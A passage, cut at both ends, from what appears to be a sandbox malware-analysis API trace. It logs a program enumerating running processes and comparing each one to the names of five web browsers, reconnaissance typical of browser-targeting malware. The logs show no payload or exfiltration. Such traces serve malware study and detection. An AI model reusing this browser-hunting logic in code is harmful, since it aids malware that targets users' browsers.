th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0163.625] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0163.625] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0163.625] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0163.625] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0163.625] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0163.625] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0163.626] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0163.626] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0163.626] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0163.626] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0163.626] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0163.626] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0163.626] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0163.626] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0163.626] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0163.626] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0163.626] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.626] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0163.627] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0163.627] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0163.627] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0163.627] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0163.627] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0163.627] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0163.627] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0163.627] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0163.627] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0163.627] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0163.627] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.628] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0163.628] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0163.628] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0163.628] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0163.628] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0163.628] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0163.628] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0163.629] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0163.629] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0163.629] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0163.629] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0163.629] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.629] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0163.629] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0163.629] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0163.629] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0163.629] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0163.630] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.630] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0163.630] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0163.630] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0163.630] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0163.630] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0163.630] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0163.630] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0163.631] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0163.631] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0163.631] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0163.631] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0163.631] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0163.631] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.631] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0163.631] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0163.631] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0163.631] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0163.631] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.631] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.632] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0163.632] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0163.632] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0163.632] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0163.632] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.632] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.633] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0163.633] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0163.633] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0163.633] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0163.633] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.633] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.633] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0163.633] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0163.633] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0163.633] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0163.633] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.633] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.634] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0163.634] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0163.634] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0163.634] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0163.634] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.634] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0163.634] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0163.634] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0163.634] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0163.634] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0163.634] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0163.635] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.635] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0163.635] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0163.635] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0163.635] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0163.635] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.635] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.636] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0163.636] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0163.636] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0163.636] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0163.636] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.636] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0163.636] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0163.636] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0163.636] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0163.636] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0163.636] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0163.636] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0163.637] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0163.637] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0163.637] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0163.637] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0163.637] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.638] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0163.638] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0163.638] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0163.638] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0163.638] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0163.638] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.638] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.639] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0163.639] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0163.639] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0163.639] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0163.639] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.639] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0163.639] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0163.639] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0163.639] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0163.639] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0163.639] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.639] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0163.640] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0163.640] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0163.640] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0163.640] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0163.640] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0163.640] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0163.640] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0163.641] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0163.641] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0163.641] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0163.641] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0163.641] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0163.641] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0163.641] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0163.641] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0163.641] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0163.641] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.641] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0163.642] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0163.642] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0163.642] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0163.642] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0163.642] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0163.642] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0163.642] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0163.643] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0163.643] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0163.643] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0163.643] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0163.643] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0163.643] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0163.643] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0163.643] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0163.643] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0163.643] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.643] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0163.644] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0163.644] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0163.644] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0163.644] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0163.644] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.644] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0163.644] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0163.644] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0163.644] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0163.644] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0163.644] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.645] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0163.645] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0163.645] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0163.645] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0163.645] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0163.645] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.645] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0163.646] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0163.646] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0163.646] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0163.646] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0163.646] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0163.646] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0163.646] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0163.646] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0163.646] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0163.646] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0163.646] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.646] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0163.647] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0163.647] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0163.647] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0163.647] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0163.647] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.647] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0163.648] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0163.648] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0163.648] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0163.648] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0163.648] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.648] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0163.648] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0163.648] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0163.648] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0163.648] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0163.648] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0163.648] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, 